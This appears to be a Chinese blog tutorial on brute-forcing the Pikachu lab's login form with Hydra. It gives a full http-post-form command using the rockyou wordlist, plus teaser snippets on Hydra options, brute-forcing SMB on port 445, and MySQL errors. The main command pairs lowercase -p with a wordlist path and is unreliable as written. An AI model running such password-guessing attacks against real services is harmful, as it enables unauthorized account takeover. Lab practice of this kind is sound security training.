部落格位址
github
kali linux
web靶機(github傳送門)
靶機表單內容如下
假設網域名稱為host.com,表單路徑為/pikachu/vul/burteforce/bf_form.php
執行命令如下
hydra -l admin -p /root/rockyou.txt -s 80 -f host.com http-post-form "/pikachu/vul/burteforce/bf_form.php:username=^user^&password=^pass^&submit=login:username or password is not exists~"/root/rockyou.txt為kali自帶的爆破字典,正常路徑位於/usr/share/wordlists/rockyou.txt;username or password is not exists~為表單錯誤提示,hydra以此判定是否爆破成功。
執行結果如下
不指定使用者名稱,使用使用者名稱字典/root/user.txt
爆破工具 Hydra 簡單使用
我用的是虛擬機器kali中自帶的hydra,hydra很強大,我們可以在github找到原始碼 我們可以使用命令檢視基本操作提示 hydra h引數 用途 l 指定單個使用者名稱,適合在知道使用者名稱爆破使用者名稱密碼時使用 l指定多個使用者名稱,引數值為儲存使用者名稱的檔案的路徑 建議為絕對路徑 ...
hydra 爆破445,22埠(筆記)
一。爆破445 smb 1.命令列 hydra 192.168.0.104 smb l administrator p root desktop 1.txt t 64 v 192.168.0.104是目標伺服器的ip位址 smb 是協議 l 大寫指定乙個帳號字典 小寫l指定使用者名稱 p 指定乙個密...
Hydra爆破mysql常見的兩個錯誤
error host 192.168.83.157 is not allowed to connect to this mysql server 這是因為沒有開啟msyql遠端服務。登入mysql mysql u root p 密碼 開啟mysql遠端訪問 use mysql update user...